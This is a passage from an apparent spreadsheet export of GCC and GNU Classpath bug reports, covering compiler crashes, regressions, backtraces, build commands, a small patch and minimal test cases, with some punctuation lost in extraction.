	stw	r9(sp20)
	stw	r8(sp24)
	mov	r12r2
	mov	r13r3
.LM2:
	bmaski	r453		&lt;- THIS IS THE ERRONEOUS INSN
	movi	r50
	cmplt	r4r4
	addc	r4r2
	addc	r5r3
	bmaski	r722	// 4194303 0x3fffff
and so on
The C code in the library (libgcc2.c) which actually gets compiled
looks like this:
  if (DF_SIZE &lt; DI_SIZE
      &amp;&amp; DF_SIZE &gt; (DI_SIZE - DF_SIZE + SF_SIZE))
    {
      if (! (- ((DWtype) 1 &lt;&lt; DF_SIZE) &lt; u
             &amp;&amp; u &lt; ((DWtype) 1 &lt;&lt; DF_SIZE)))
        {
          if ((UDWtype) u &amp; (REP_BIT - 1))
            {
              u 
              u |= REP_BIT
            }
        }
    }
After running through the preprocessor ( with xgcc -E ) the actual C code looks 
like this: 
#pragma GCC visibility pop
# 44 ../../gcc-4.1.0/gcc/libgcc2.c 2
# 1352 ../../gcc-4.1.0/gcc/libgcc2.c
SFtype
__floatdisf (DItype u)
{
# 1378 ../../gcc-4.1.0/gcc/libgcc2.c
  if (53 &lt; ((4 * 8) * 2)
      &amp;&amp; 53 &gt; (((4 * 8) * 2) - 53 + 24))
    {
      if (! (- ((DItype) 1 &lt;&lt; 53) &lt; u		/* THIS GENERATES THE ERROR */
      &amp;&amp; u &lt; ((DItype) 1 &lt;&lt; 53)))
 {
   if ((UDItype) u &amp; (((UDItype) 1 &lt;&lt; (((4 * 8) * 2) - 53)) - 1))
     {
       u 
       u |= ((UDItype) 1 &lt;&lt; (((4 * 8) * 2) - 53))
     }
 }
Further examination reveals a bug in xgcc itself the following very short
code fragment generates the erroneous assembly insn:
long long XgccBug( long long a )
{
	return( a 
}
results in the following (erroneous) assembly code:
        .file   x.c
        .text
        .align  1
        .export XgccBug
        .type   XgccBug @function
XgccBug:
        bmaski  r633
        movi    r70
        and     r2r6
        and     r3r7
        jmp     r15
        .size   XgccBug .-XgccBug
Since the compiler can be built successfully on a 32-bit system the error
probably is that gcc/config/mcore.c somewhere assumes that the target and 
the host integers are the same size. I don't understand gcc's internals 
enough to work out the exact location/reason/fix of the bug.
Zoltan</t>
  </si>
  <si>
    <t>zoltan</t>
  </si>
  <si>
    <t>GCC-19148</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: gimplification failed</t>
  </si>
  <si>
    <t>$ uname -a
SunOS poog 5.9 Generic_117171-12 sun4u sparc SUNWSun-Fire-V250
$ gcc -v
Using built-in specs.
Configured with: /opt/build/gcc-4.0/configure --enable-nls
--with-included-gettext --enable-shared --enable-libgcj --disable-multilib
--enable-threads --datadir=/opt/TWWfsw/gcc40/share
--with-local-prefix=/opt/TWWfsw/gcc40 --prefix=/opt/TWWfsw/gcc40
Thread model: posix
gcc version 4.0.0 20041224 (experimental)
$ g++ -c -isystem /usr/openwin/include -I/opt/TWWfsw/jpeg/include
-I/opt/TWWfsw/libmng10/include -I/opt/TWWfsw/libpng12/include
-I/opt/TWWfsw/zlib11/include -I/opt/TWWfsw/fcpackage22/include
-I/opt/TWWfsw/libttf21/include -fno-exceptions -Wall -W -g -D_REENTRANT -fPIC
-DQT_SHARED -DQT_NO_DEBUG -DQT_THREAD_SUPPORT -DQT_THREAD_SUPPORT -DQT_NO_CUPS
-D_LARGEFILE_SOURCE -D_LARGE_FILES -D_FILE_OFFSET_BITS=64 -DQT_NO_XINERAMA
-DQT_NO_XCURSOR -DQT_NO_XRANDR -DQT_BUILTIN_GIF_READER=1 -DQT_NO_STYLE_MAC
-DQT_NO_STYLE_AQUA -DQT_NO_STYLE_INTERLACE -DQT_NO_STYLE_WINDOWSXP
-DQT_NO_STYLE_COMPACT -DQT_NO_STYLE_POCKETPC
-I/opt/build/qt-x11-free-3.3.2/mkspecs/solaris-g++ -I.
-I/opt/TWWfsw/libttf21/include/freetype2 -I3rdparty/opentype -I../include
-I/usr/openwin/share/include -I.moc/release-shared-mt/ -o
.obj/release-shared-mt/qisciicodec.o codecs/qisciicodec.cpp
gimplification failed:
*uc.130 &lt;indirect_ref fe1a6360
    type &lt;record_type fe39b770 QChar addressable asm_written needs-constructing
type_1 type_5 type_6 BLK
        size 
        unit size 
        align 16 symtab -29783952 alias set -1
        fields 
            readonly addressable used public static external nonlocal decl_3
decl_5 decl_6 BLK file ../include/qstring.h line 85 size &lt;integer_cst ff004360
16&gt; unit size 
            align 16 context 
            chain &gt;
       needs-constructor X() has-type-conversion X(constX&amp;) this=(X&amp;)
n_parents=0 use_template=0 interface-unknown
        pointer_to_this  reference_to_this
 chain &gt;
    arg 0 &lt;var_decl fe1a5950 uc.130
        type 
            asm_written public unsigned SI
            size 
            unit size 
            align 32 symtab -29702272 alias set -1&gt;
        used unsigned ignored SI file codecs/qisciicodec.cpp line 222 size
 unit size 
        align 32 context 
        chain 
            used unsigned ignored QI file codecs/qisciicodec.cpp line 220
            size 
            unit size 
            align 8 context  chain &lt;var_decl
fe1a5860&gt;&gt;&gt;&gt;
codecs/qisciicodec.cpp: In member function 'virtual QString
QIsciiCodec::toUnicode(const char* int) const':
codecs/qisciicodec.cpp:222: internal compiler error: gimplification failed</t>
  </si>
  <si>
    <t>bugzilla-gcc</t>
  </si>
  <si>
    <t>GCC-9145</t>
  </si>
  <si>
    <t>Re: New C++ parser regression on mips-irix6 with g++.jason/thunk1.C</t>
  </si>
  <si>
    <t xml:space="preserve"> --On Thursday January 02 2003 05:29:05 PM +0000 ghazi@caip.rutgers.edu 
  wrote:
 &gt;&gt; Category:       c++
 &gt;&gt; Synopsis:       New C++ parser regression on mips-irix6 with
 Actually I don't think this has anything to do with the new parser I
 think it has to do with the recent thunk changes Nathan made.
 Here's a fix.  I don't have any easy way to test this change would you
 mind running it on your system and check it in if it works?
 Thanks
 -- 
 Mark Mitchell                mark@codesourcery.com
 CodeSourcery LLC            http://www.codesourcery.com
 Index: method.c
 ===================================================================
 RCS file: /cvs/gcc/gcc/gcc/cp/method.cv
 retrieving revision 1.242
 diff -c -5 -p -r1.242 method.c
 *** method.c	1 Jan 2003 11:58:57 -0000	1.242
 --- method.c	2 Jan 2003 20:23:40 -0000
 *************** use_thunk (tree thunk_fndecl bool emit_
 *** 478487 ****
 --- 478488 ----
   	 code for efficient thunks generate a thunk function that
   	 just makes a call to the real function.  Unfortunately this
   	 doesn't work for varargs.  */
         tree a t
 +       int saved_check_access
         if (varargs_function_p (function))
   	error (generic thunk code fails for method `%#D' which uses `...'
   	       function)
 *************** use_thunk (tree thunk_fndecl bool emit_
 *** 499510 ****
         DECL_RESULT (thunk_fndecl) = NULL_TREE
         start_function (NULL_TREE thunk_fndecl NULL_TREE SF_PRE_PARSED)
         /* We don't bother with a body block for thunks.  */
         t = a
 -
         if (this_adjusting)
   	t = thunk_adjust (t /*this_adjusting=*/1
   			  fixed_offset virtual_offset)
         /* Build up the call to the real function.  */
 --- 500514 ----
         DECL_RESULT (thunk_fndecl) = NULL_TREE
         start_function (NULL_TREE thunk_fndecl NULL_TREE SF_PRE_PARSED)
         /* We don't bother with a body block for thunks.  */
 +       /* There's no need to check accessibility inside the thunk body.  */
 +       saved_check_access = scope_chain-&gt;check_access
 +       scope_chain-&gt;check_access = 0
 +
         t = a
         if (this_adjusting)
   	t = thunk_adjust (t /*this_adjusting=*/1
   			  fixed_offset virtual_offset)
         /* Build up the call to the real function.  */
 *************** use_thunk (tree thunk_fndecl bool emit_
 *** 526535 ****
 --- 530542 ----
   	 referenced.  */
         TREE_SYMBOL_REFERENCED (DECL_ASSEMBLER_NAME (thunk_fndecl)) = 1
         /* But we don't want debugging information about it.  */
         DECL_IGNORED_P (thunk_fndecl) = 1
 +
 +       /* Re-enable access control.  */
 +       scope_chain-&gt;check_access = saved_check_access
         expand_body (finish_function (0))
       }
     pop_from_top_level ()
Release:
unknown
Unformatted:
  (and thunk2.C/thunk3.C)</t>
  </si>
  <si>
    <t>GCC-82481</t>
  </si>
  <si>
    <t>dangling reference in mutex:693</t>
  </si>
  <si>
    <t>Building the following minimal example with libstdc++ 7.0.1 using clang-tidy 4.0.0 on Ubuntu 17.04:
main.cpp:
  #include 
  int main() {
    std::promise p
    p.set_value(3)
  }
Build command:
   $ clang-tidy main.cpp -extra-arg=-std=c++14
Output:
    Running without flags.
    1 warning generated.
    /usr/lib/gcc/x86_64-linux-gnu/7.0.1/../../../../include/c++/7.0.1/mutex:693:5: warning: Address of stack memory associated with local variable '__callable' is still referred to by the global variable '__once_callable' upon returning to the caller.  This will be a dangling reference [clang-analyzer-core.StackAddressEscape]
        }
        ^
    /home/user/main.cpp:5:3: note: Calling 'promise::set_value'
      p.set_value(3)
      ^
    /usr/lib/gcc/x86_64-linux-gnu/7.0.1/../../../../include/c++/7.0.1/future:1094:9: note: Calling '_State_baseV2::_M_set_result'
          { _M_future-&gt;_M_set_result(_State::__setter(this std::move(__r))) }
            ^
    /usr/lib/gcc/x86_64-linux-gnu/7.0.1/../../../../include/c++/7.0.1/future:401:2: note: Calling 'call_once'
            call_once(_M_once &amp;_State_baseV2::_M_do_set this
            ^
    /usr/lib/gcc/x86_64-linux-gnu/7.0.1/../../../../include/c++/7.0.1/mutex:691:11: note: Assuming '__e' is 0
          if (__e)
              ^
    /usr/lib/gcc/x86_64-linux-gnu/7.0.1/../../../../include/c++/7.0.1/mutex:691:7: note: Taking false branch
          if (__e)
          ^
    /usr/lib/gcc/x86_64-linux-gnu/7.0.1/../../../../include/c++/7.0.1/mutex:693:5: note: Address of stack memory associated with local variable '__callable' is still referred to by the global variable '__once_callable' upon returning to the caller.  This will be a dangling reference
        }</t>
  </si>
  <si>
    <t>heinzisoft</t>
  </si>
  <si>
    <t>GCC-66020</t>
  </si>
  <si>
    <t>[6.0 regression] FAIL: gcc.target/powerpc/ppc64-abi-2.c execution test</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ ../gcc/testsuite/gcc.target/powerpc/ppc64-abi-2.c -O2 -fprofile -mprofile-kernel -maltivec -mabi=altivec -lm -m64 -o ./ppc64-abi-2.exe
$ ./ppc64-abi-2.exe
Segmentation fault
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x00003fffb7d24dcc in generic_start_main (
    main=@0x10012190: 0x100005d0  argc= 
    argv=0x3fffffffef48 auxvec=0x3ffffffff220 init= 
    rtld_fini= stack_end= fini=)
    at ../csu/libc-start.c:269
#2  0x00003fffb7d24fd4 in __libc_start_main (argc= 
    argv= ev= auxvec= 
    rtld_fini= stinfo= 
    stack_on_entry=)
    at ../sysdeps/unix/sysv/linux/powerpc/libc-start.c:80
#3  0x0000000000000000 in ?? ()
Breakpoint 3 fcvi (s=0x100011e0 vv v=... i=2)
    at ../gcc/testsuite/gcc.target/powerpc/ppc64-abi-2.c:138
138       reg_parms_t lparms = gparms
(gdb) disass
Dump of assembler code for function fcvi:
   0x0000000010000900 :     mflr    r0
   0x0000000010000904 :     bl      0x10000820 
   0x0000000010000908 :     mflr    r0
=&gt; 0x000000001000090c :    nop
   0x0000000010000910 :    li      r8176
   0x0000000010000914 :    ld      r10-32744(r2)
   0x0000000010000918 :    std     r016(r1)
   0x000000001000091c :    stdu    r1-112(r1)
   0x0000000010000920 :    ld      r90(r10)
   0x0000000010000924 :    ld      r632(r10)
   0x0000000010000928 :    cmpd    cr7r3r9
   0x000000001000092c :    lvx     v0r10r8
   0x0000000010000930 :    bne-    cr70x10000954 
   0x0000000010000934 :    vcmpequw. v2v2v0
   0x0000000010000938 :    bge-    cr60x10000954 
   0x000000001000093c :    cmpd    cr7r7r6
   0x0000000010000940 :    bne-    cr70x10000954 
   0x0000000010000944 :    addi    r1r1112
   0x0000000010000948 :    ld      r016(r1)
   0x000000001000094c :    mtlr    r0
   0x0000000010000950 :    blr
   0x0000000010000954 :    bl      0x100005bc 
   0x0000000010000958 :    ld      r240(r1)
   0x000000001000095c :    .long 0x0
   0x0000000010000960 :    .long 0x1
   0x0000000010000964 :   lwz     r00(0)
End of assembler dump.
(gdb) i reg r0
r0             0x0      0</t>
  </si>
  <si>
    <t>GCC-52027</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: SIGSEGV in set_cur_line_info_table (dwarf2out.c:20428) with -O -freorder-blocks-and-partition -fno-reorder-functions -fprofile-use</t>
  </si>
  <si>
    <t>Created attachment 26488
reduced testcase (from gcc.dg/tree-prof/val-prof-7.c)
Compiler output:
$ rm *.gcda
$ gcc -O -freorder-blocks-and-partition -fno-reorder-functions testcase.c -fprofile-generate
$ ./a.out
$ gcc -O -freorder-blocks-and-partition -fno-reorder-functions testcase.c -fprofile-use
==22173== Invalid write of size 1
==22173==    at 0x6FE04F: set_cur_line_info_table(section*) (dwarf2out.c:20428)
==22173==    by 0x78A28D: final_scan_insn(rtx_def* _IO_FILE* int int int*) (final.c:1925)
==22173==    by 0x78B5DA: final(rtx_def* _IO_FILE* int) (final.c:1786)
==22173==    by 0x78BEEE: rest_of_handle_final() (final.c:4319)
==22173==    by 0x8FB8E4: execute_one_pass(opt_pass*) (passes.c:2081)
==22173==    by 0x8FBCA4: execute_pass_list(opt_pass*) (passes.c:2136)
==22173==    by 0x8FBCB6: execute_pass_list(opt_pass*) (passes.c:2137)
==22173==    by 0x8FBCB6: execute_pass_list(opt_pass*) (passes.c:2137)
==22173==    by 0xA5DFFD: tree_rest_of_compilation(tree_node*) (tree-optimize.c:420)
==22173==    by 0x6AFE39: cgraph_expand_function(cgraph_node*) (cgraphunit.c:1819)
==22173==    by 0x6B1D0B: cgraph_optimize() (cgraphunit.c:1886)
==22173==    by 0x6B2369: cgraph_finalize_compilation_unit() (cgraphunit.c:1328)
==22173==    by 0x58EC1F: c_write_global_declarations() (c-decl.c:10030)
==22173==    by 0x9F081B: toplev_main(int char**) (toplev.c:573)
==22173==    by 0x66E009C: (below main) (in /lib64/libc-2.13.so)
==22173==  Address 0x18 is not stack'd malloc'd or (recently) free'd
==22173== 
testcase.c: In function 'foo':
testcase.c:6:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r183652 - crash
r183495 - crash
r182547 - crash
r180540 - OK
4.6 r180325 - OK</t>
  </si>
  <si>
    <t>GCC-35997</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] Used function interface bug</t>
  </si>
  <si>
    <t>Code that has a function interface used from two modules can fail if one of the modules renames the function interface. The example below fails to compile with this message:
gfortran testfuncinterface.f90 
testfuncinterface.f90:21.7:
  if ( valid() ) then
      1
Error: IF clause at (1) requires a scalar LOGICAL expression
Source Code:
module funcinterfacemod
  interface
    logical function valid()
    end function
  end interface
end module
module secondmod
  use funcinterfacemod valid2 =&gt; valid
end module
logical function valid()
  valid = .true.
end function
program main
  use secondmod
  use funcinterfacemod
  if ( valid() ) then
    print *'Is Valid'
  endif
end program
This example does compile is the order of the use statements is reversed. This also compiles on earlier versions of gfortran (eg 4.3.0 20071114 (experimental) (GCC))</t>
  </si>
  <si>
    <t>drewmccormack</t>
  </si>
  <si>
    <t>GCC-1991</t>
  </si>
  <si>
    <t>Tree check: expected class 'e' have 'x' (identifier_node) when compiling Tomcat</t>
  </si>
  <si>
    <t>./javax/servlet/jsp/tagext/TagData.java
./javax/servlet/jsp/tagext/TagData.java: In class `javax.servlet.jsp.tagext.TagData':
./javax/servlet/jsp/tagext/TagData.java: In method `(java.lang.Object[])':
./javax/servlet/jsp/tagext/TagData.java:106: `[]' can only be applied to arrays. It can't be applied to `java.lang.Object'.
                attributes.put(atts[i][0] atts[i][1])
                                                     ^
./javax/servlet/jsp/tagext/TagData.java:106: `[]' can only be applied to arrays. It can't be applied to `java.lang.Object'.
                attributes.put(atts[i][0] atts[i][1])
                                         ^
./javax/servlet/jsp/tagext/TagData.java:1: Tree check: expected class 'e' have 'x' (identifier_node)
./javax/servlet/jsp/tagext/TagData.java:1: confused by earlier errors bailing out
Release:
gcc version 2.97 20010214 (experimental)
Environment:
Configured with: ../gcc/configure --enable-threads=posix --prefix=/home/dyp/opt/gcc --enable-languages=c++f77java --enable-libstdcxx-v3
How-To-Repeat:
Try to build latest Tomcat using gcj.</t>
  </si>
  <si>
    <t>GCC-11717</t>
  </si>
  <si>
    <t>[3.3 regression] [alpha] unrecognizable insn compiling for.c of kernel 2.4.22-pre8</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/202762]
seen with 3.3 CVS 20030728 works with 3.2.3 and HEAD CVS 20030722.
trying to compile kernel 2.4.22-pre8 on alpha:
$ gcc -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe
-mno-fp-regs -ffixed-8 -mcpu=ev56 -Wa-mev6 -c fork.i
fork.c: In function `dup_mmap':
fork.c:144: error: unrecognizable insn:
(insn 59 52 61 0 0x20000ce7760 (set (reg/f:DI 82)
        (symbol_ref:DI (@Smmlist_nr))) -1 (nil)
    (expr_list:REG_EQUAL (symbol_ref:DI (@Smmlist_nr))
            (nil)))
    fork.c:144: internal compiler error: in
    extract_insn at recog.c:2175
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [fork.o] Error 1</t>
  </si>
  <si>
    <t>GCC-52819</t>
  </si>
  <si>
    <t>ICE: tree check: expected tree that contains 'decl minimal' structure have 'nop_expr' in decl_linkage at cp/tree.c:3136</t>
  </si>
  <si>
    <t>------- g++ -v -------
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=....../libexec/gcc/x86_64-w64-mingw32
/4.7.0/lto-wrapper.exe
Target: x86_64-w64-mingw32
Configured with: ......./build/gcc/src/configure --target=x86_64-w64-mingw32 --
prefix=/c/bb/vista64-mingw32/mingw-x86-x86_64/build/build/root --with-sysroot=/c
/bb/vista64-mingw32/mingw-x86-x86_64/build/build/root --enable-languages=allobj
-c++ --enable-fully-dynamic-string --disable-multilib
Thread model: win32
gcc version 4.7.0 20111220 (experimental) (GCC)
----------------------
------- g++ -std=c++11 code.cpp -------
typedef void (*cfi)(void*)
void function(int *a) {}
template
void get() { Func(0) }
int main()
{
	get()
	return 0
}
----------------------------------------</t>
  </si>
  <si>
    <t>gessos.paul</t>
  </si>
  <si>
    <t>GCC-61200</t>
  </si>
  <si>
    <t>internal compiler error: Segmentation fault assert &amp; openmp</t>
  </si>
  <si>
    <t>Created attachment 32807
Minimal test case
When trying to compile attached file with -fopenmp I get a segmentation fault.
Tried with gcc 4.4.5 (on debian squeeze) 4.8.2 (on cygwin fedora 20 and debian wheezy) and 4.9.0 and all of them crash.
The problem occurs when there is an assert in a parallel region containing a variable and then you have a task with that variable as share and you access it in any way.
The problem doesn't occur if the assert is not in a #pragma omp parallel or if you change he following task to parallel or if you remove the shared directive from the task or finally if you don't access the variable inside the task.
The assert call can contain anything as long as it contains the variable that is accessed later in a task.
Here is the output of ./gcc-4.9.0/bin/gcc -v -save-temps -fopenmp fopenmpSeg.c:
Using built-in specs.
COLLECT_GCC=./gcc-4.9.0/bin/gcc
COLLECT_LTO_WRAPPER=/home/psxlover/gcc-4.9.0/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/configure --prefix=/home/psxlover/gcc-4.9.0 --disable-multilib
Thread model: posix
gcc version 4.9.0 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-fopenmp' '-mtune=generic' '-march=x86-64' '-pthread'
 /home/psxlover/gcc-4.9.0/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/cc1 -E -quiet -v -D_REENTRANT fopenmpSeg.c -mtune=generic -march=x86-64 -fopenmp -fpch-preprocess -o fopenmpSeg.i
ignoring nonexistent directory /home/psxlover/gcc-4.9.0/lib/gcc/x86_64-unknown-linux-gnu/4.9.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/psxlover/gcc-4.9.0/lib/gcc/x86_64-unknown-linux-gnu/4.9.0/include
 /usr/local/include
 /home/psxlover/gcc-4.9.0/include
 /home/psxlover/gcc-4.9.0/lib/gcc/x86_64-unknown-linux-gnu/4.9.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-fopenmp' '-mtune=generic' '-march=x86-64' '-pthread'
 /home/psxlover/gcc-4.9.0/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/cc1 -fpreprocessed fopenmpSeg.i -quiet -dumpbase fopenmpSeg.c -mtune=generic -march=x86-64 -auxbase fopenmpSeg -version -fopenmp -o fopenmpSeg.s
GNU C (GCC) version 4.9.0 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.9.0 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (GCC) version 4.9.0 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.9.0 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 24a1e3ed1d75ecc9aae55f188f0fd7ae
fopenmpSeg.c: In function â€˜mainâ€™:
fopenmpSeg.c:8:28: internal compiler error: Segmentation fault
   assert(var == 1)
                            ^
0x8e103f crash_signal
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/toplev.c:337
0x7723e1 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/gimplify.c:8376
0x779cd0 gimple_regimplify_operands(gimple_statement_base* gimple_stmt_iterator*)
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/gimplify-me.c:172
0x82853b lower_omp_1
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10139
0x82853b lower_omp
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10151
0x82cca4 lower_omp_taskreg
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:9485
0x828dfe lower_omp_1
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10016
0x828dfe lower_omp
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10151
0x8292dc lower_omp_1
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10008
0x8292dc lower_omp
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10151
0x82ad6a execute_lower_omp
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10183
0x82ad6a execute
	/home/psxlover/Downloads/gcc4.9obj/../gcc-4.9.0/gcc/omp-low.c:10222
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>psxlover</t>
  </si>
  <si>
    <t>GCC-26796</t>
  </si>
  <si>
    <t>[4.2 Regression] ACATS ICE c34002a c52005 spurious storage_error</t>
  </si>
  <si>
    <t>Happens on x86 and x86_64-linux was working 20060314
/home/guerby/work/gcc/build/build-head-20060321T234940/gcc/xgcc -c -B/home/guerby/work/gcc/build/build-head-20060321T234940/gcc/ -gnatws -O2 -I/home/guerby/work/gcc/build/build-head-20060321T234940/gcc/testsuite/ada/acats/support c34002a.adb
raised STORAGE_ERROR : stack overflow (or erroneous memory access)
/home/guerby/work/gcc/build/build-head-20060321T234940/gcc/xgcc -c -B/home/guerby/work/gcc/build/build-head-20060321T234940/gcc/ -gnatws -O2 -I/home/guerby/work/gcc/build/build-head-20060321T234940/gcc/testsuite/ada/acats/support c52005e.adb
raised STORAGE_ERROR : stack overflow (or erroneous memory access)
gnatmake: c52005e.adb compilation error</t>
  </si>
  <si>
    <t>GCC-34137</t>
  </si>
  <si>
    <t>Module function with ENTRY rejected</t>
  </si>
  <si>
    <t>The following program should print
 12
 -14.0000000
but gfortran rejects it with
  Error: Contained function 'master.0.func' at (1) has no IMPLICIT type
It fails with GCC 4.1.3 4.2.1 and 4.3.0 with:
end module m
           1
Error: Contained function 'master.0.func' at (1) has no IMPLICIT type
The same program compiles with NAG f95 g95 ifort. If one puts the procedure not into a module it works.
module m
  implicit none
contains
function func(a)
  integer :: a func
  real :: ent
  func = a*4
  return
entry ent(a)
  ent = -a*2.0
  return
end function func
end module m
program main
  use m
  implicit none
  print * func(3)
  print * ent(7)
end program main</t>
  </si>
  <si>
    <t>GCC-4965</t>
  </si>
  <si>
    <t>Segmentation fault building mipsisa32-elf</t>
  </si>
  <si>
    <t>Segmentation fault attempting to build cross compiler for mips32isa-elf. Fault occurs while compiling fp-bit.c to produce _pack_sf.o. Preprocessor output file attached.
Release:
CVS current 2001-11-28
Environment:
OpenBSD 2.9 i386 host mipsisa32-elf target
How-To-Repeat:
Build cross compiler for target mipsisa32-elf. I also used the binutils-011128 snapshot in this build.</t>
  </si>
  <si>
    <t>mrustad</t>
  </si>
  <si>
    <t>GCC-66807</t>
  </si>
  <si>
    <t>[6 Regression] --enable-libmpx failed</t>
  </si>
  <si>
    <t>On Linux/x86-64 r225548 gave:
libtool: compile:  /export/build/gnu/gcc/build-x86_64-linux/./gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/./gcc/ -B/usr/gcc-6.0.0/x86_64-unknown-linux-gnu/bin/ -B/usr/gcc-6.0.0/x86_64-unknown-linux-gnu/lib/ -isystem /usr/gcc-6.0.0/x86_64-unknown-linux-gnu/include -isystem /usr/gcc-6.0.0/x86_64-unknown-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I/export/gnu/import/git/sources/gcc/libmpx/mpxwrap -I.. -fcheck-pointer-bounds -mmpx -fno-chkp-check-read -fno-chkp-check-write -fno-chkp-use-wrappers -fPIC -g -O2 -c /export/gnu/import/git/sources/gcc/libmpx/mpxwrap/mpx_wrappers.c  -fPIC -DPIC -o .libs/libmpxwrappers_la-mpx_wrappers.o
/export/gnu/import/git/sources/gcc/libmpx/mpxwrap/mpx_wrappers.c: In function \u2018__mpx_wrapper_strlen.chkp\u2019:
/export/gnu/import/git/sources/gcc/libmpx/mpxwrap/mpx_wrappers.c:276:1: internal compiler error: in execute_function_todo at passes.c:1932
 __mpx_wrapper_strlen (const char *s)
 ^
0xe28f0a execute_function_todo
	/export/gnu/import/git/sources/gcc/gcc/passes.c:1932
0xe2808a do_per_function
	/export/gnu/import/git/sources/gcc/gcc/passes.c:1638
0xe2917d execute_todo
	/export/gnu/import/git/sources/gcc/gcc/passes.c:2004
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Makefile:385: recipe for target 'libmpxwrappers_la-mpx_wrappers.lo' failed
make[3]: *** [libmpxwrappers_la-mpx_wrappers.lo] Error 1
make[3]: Leaving directory '/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/libmpx/mpxwrap'
Makefile:410: recipe for target 'all-recursive' failed
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory '/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/libmpx'
Makefile:301: recipe for target 'all' failed
make[1]: *** [all] Error 2
make[1]: Leaving directory '/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/libmpx'
Makefile:14254: recipe for target 'all-target-libmpx' failed
make: *** [all-target-libmpx] Error 2
when --enable-libmpx is used to configure GCC.</t>
  </si>
  <si>
    <t>CLASSPATH-28333</t>
  </si>
  <si>
    <t>crypto</t>
  </si>
  <si>
    <t>CBC Ciphers do not contain the correct ParameterSpec</t>
  </si>
  <si>
    <t>CBC Ciphers do not have the correct ParameterSpec. It should contain an javax.crypto.spec.IVParameterSpec but its a gnu.javax.crypto.jce.spec.BlockCipherParameterSpec instead.
For example the following code fragment should pass but it fails with an InvalidParameterSpecException: 
Cipher cipher = Cipher.getInstance(DESede/CBC/NoPadding)
AlgorithmParameters ap = cipher.getParameters()
AlgorithmParameterSpec aps = ap.getParameterSpec(IvParameterSpec.class)
I will write a proper mauve testlet for this tomorrow.</t>
  </si>
  <si>
    <t>csm</t>
  </si>
  <si>
    <t>mwringe</t>
  </si>
  <si>
    <t>GCC-17027</t>
  </si>
  <si>
    <t>[3.4 regression] ICE with noreturn function in loop at -O2</t>
  </si>
  <si>
    <t>the ice only occurs when the code is compiled with -O2. Other values for -O don't
give the ice.
This bug is also in 3.4.0.
Gcc 3.3 compiles fine.</t>
  </si>
  <si>
    <t>sfc</t>
  </si>
  <si>
    <t>CLASSPATH-24407</t>
  </si>
  <si>
    <t>Component.getForeground() never returns null</t>
  </si>
  <si>
    <t>The getForeground() method returns a default value (SystemColor.windowText) if the foreground field is null whereas the reference implementation returns null.  I've added a Mauve test to show this (java.awt.Component.getForeground).
This is causing a problem in the Swing look and feel code where the look and feel default color is only installed if the existing color is null or an instance of UIResource.  Since neither of those conditions is met the foreground color for the Swing component is not set.
I could probably fix the bug myself but I'd rather that someone familiar with the AWT code looked at it because I'm not sure what else depends on the current (incorrect) behaviour of this method.
Regards
Dave</t>
  </si>
  <si>
    <t>david.gilbert</t>
  </si>
  <si>
    <t>GCC-34391</t>
  </si>
  <si>
    <t>[4.3 Regression] Vectorizer does not fix up alias information correctly</t>
  </si>
  <si>
    <t>The vectorizer currently ICEs for ppc64 and vect-27.c (and other testcases) beacuse at the point it generates pointers for the vector accesses from the
static variable it does not set up pointer alias information correctly:
:
ib.20_12 = (__vector signed int *) 
vect_pib.19_11 = ib.20_12 + 4
vect_pib.14_15 = vect_pib.19_11
# VUSE  { ib SMT.15 }
vect_var_.13_16 = A*vect_pib.14_15
